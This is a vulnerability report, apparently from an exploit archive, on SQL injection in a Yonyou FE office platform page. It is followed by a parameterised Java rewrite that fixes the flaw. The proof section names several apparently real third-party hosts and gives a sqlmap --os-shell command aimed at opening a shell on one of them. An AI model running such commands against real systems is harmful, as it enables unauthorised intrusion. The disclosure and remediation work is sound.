### Brief description: A Yonyou system has a generic SQL injection

### Details:

Yonyou FE Collaborative Office Platform, latest version.

Vulnerable URL:

```
/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3
```

Partial code:

```
<%
// String searchValue=HtmlFormat.format(request.getParameter("searchValue"));// this parameter
String filter="";
Dao dao=(Dao)ResourceManage.getContext("basicDao");
FieldSet groupFs=dao.getFieldSetByFilter("SYS_GROUP","SG04='/'");
String groupName=groupFs.getString("SG03");
DataTable dataTable=null;
if(!"".equals(roleId)){
    if(!groupName.equals(dept))
        filter=" and su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ;
    else
        filter=" su00 not in (select su00 from user_role_v where sr03='"+dept+"' and sr00 = "+roleId+")" ;
}
if(!"".equals(searchValue)){
    filter=filter+" and (su02 like '%"+searchValue+"%' or SU01 like '%"+searchValue+"%')";
}
if(!groupName.equals(dept)){
    dataTable=dao.getDataTable("GROUP_USER_V"," sg03='"+dept+"'"+filter,"gu03");
}
else{
    dataTable=dao.getDataTable("SYS_USERS",filter,"SU03");
}
%>
```

The searchValue parameter is injectable.

Proof:

```
http://oa.jiada.cc:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3
```

[![1.jpg](https://images.seebug.org/upload/201405/241733258756c2bf77141956cff60c197e375b52.jpg)](https://images.seebug.org/upload/201405/241733258756c2bf77141956cff60c197e375b52.jpg)

```
http://oa.shunhengli.com:9090/security/role_add_user.jsp?dept=1&roleid=2&searchValue=3
```

[![2.jpg](https://images.seebug.org/upload/201405/24173758a611e2fcec3258a16170d4881448a19c.jpg)](https://images.seebug.org/upload/201405/24173758a611e2fcec3258a16170d4881448a19c.jpg)

```
http://oa.nbsec.org:9090//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3
```

[![3.jpg](https://images.seebug.org/upload/201405/241739581865494dc9783e20e373f9b12a6df0bc.jpg)](https://images.seebug.org/upload/201405/241739581865494dc9783e20e373f9b12a6df0bc.jpg)

```
http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3
```

[![4.jpg](https://images.seebug.org/upload/201405/2417423850a0f5159e9947c8274999b3ec4c0e19.jpg)](https://images.seebug.org/upload/201405/2417423850a0f5159e9947c8274999b3ec4c0e19.jpg)

### Proof of vulnerability:

```
sqlmap -u "http://oa.bnuz.edu.cn:8080//security/role_add_user.jsp?dept=1&roleid=2&searchValue=3" -p searchValue --os-shell
```

[![5.jpg](https://images.seebug.org/upload/201405/24174518c95eb06c33dcf401c4d79d45f8088b20.jpg)](https://images.seebug.org/upload/201405/24174518c95eb06c33dcf401c4d79d45f8088b20.jpg)
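The root cause visible in the snippet is that `dept`, `roleId` and `searchValue` are concatenated straight into the filter string handed to `dao.getDataTable`; the `HtmlFormat.format` call is, by its name, an HTML-encoding step and does nothing to keep a single quote from terminating a SQL string literal. The class below is an added example, not code from the Yonyou FE product or from the report. It rebuilds the same filter logic with JDBC `PreparedStatement` placeholders so that every request value is bound as data. The class name `RoleAddUserQuery`, the `select *` wrapper around `GROUP_USER_V`/`SYS_USERS`, the `rootGroupName` parameter (standing in for the `SG03` value the original looks up from `SYS_GROUP`) and the use of plain JDBC instead of the product's DAO are all assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

// Hardened rewrite of the role_add_user.jsp filter logic (added example, not product code).
// Assumption: plain JDBC is available; the original DAO's getDataTable(table, filter, order)
// call is replaced by a hypothetical parameterised query executed through PreparedStatement.
public final class RoleAddUserQuery {

    /** SQL text with '?' placeholders plus the values to bind, in order. */
    public static final class Query {
        public final String sql;
        public final List<Object> params;
        Query(String sql, List<Object> params) { this.sql = sql; this.params = params; }
    }

    /** Escape LIKE metacharacters so a search for "50%" matches a literal percent sign. */
    static String escapeLike(String s) {
        return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
    }

    /**
     * Rebuilds the original filter: exclude users already holding roleId in dept,
     * optionally narrow by searchValue on SU02/SU01, then read GROUP_USER_V
     * (dept is not the root group) or SYS_USERS (dept is the root group).
     * Every request value becomes a bound parameter; none is concatenated into SQL.
     */
    public static Query build(String dept, String roleId, String searchValue, String rootGroupName) {
        List<Object> params = new ArrayList<>();
        StringBuilder where = new StringBuilder();
        boolean rootGroup = rootGroupName.equals(dept);

        if (!rootGroup) {
            where.append(" sg03 = ?");
            params.add(dept);
        }
        if (!roleId.isEmpty()) {
            where.append(where.length() > 0 ? " and" : "")
                 .append(" su00 not in (select su00 from user_role_v where sr03 = ? and sr00 = ?)");
            params.add(dept);
            // sr00 is compared unquoted (numeric) in the original; parseInt rejects anything else early.
            params.add(Integer.parseInt(roleId));
        }
        if (!searchValue.isEmpty()) {
            where.append(where.length() > 0 ? " and" : "")
                 .append(" (su02 like ? escape '\\' or su01 like ? escape '\\')");
            String pattern = "%" + escapeLike(searchValue) + "%";
            params.add(pattern);
            params.add(pattern);
        }
        String table = rootGroup ? "SYS_USERS" : "GROUP_USER_V";
        String order = rootGroup ? "SU03" : "gu03";
        String sql = "select * from " + table
                + (where.length() > 0 ? " where" + where : "")
                + " order by " + order;
        return new Query(sql, params);
    }

    /** Bind the parameters and run the query on a caller-supplied JDBC connection. */
    public static ResultSet run(Connection conn, Query q) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(q.sql);
        for (int i = 0; i < q.params.size(); i++) {
            ps.setObject(i + 1, q.params.get(i));
        }
        return ps.executeQuery();
    }

    public static void main(String[] args) {
        // Values from the report's URL; "ROOT" is a constructed stand-in for the SG03 of the group whose SG04 is '/'.
        Query q = build("1", "2", "3", "ROOT");
        System.out.println(q.sql);
        System.out.println(q.params);
        // A search value containing a quote changes only the bound data, never the SQL text.
        Query q2 = build("1", "2", "O'Brien", "ROOT");
        System.out.println(q2.sql.equals(q.sql) ? "SQL text unchanged" : "SQL text changed");
    }
}
```

Building the `where` clause conditionally also removes a secondary defect in the original: when `roleId` is empty and `dept` is the root group, the original `filter` starts with a dangling `" and (su02 like ..."`, which only works because of how the DAO happens to assemble the statement. The `escape '\'` clause is what keeps a user-typed `%` or `_` from acting as a wildcard; parameter binding alone does not do that.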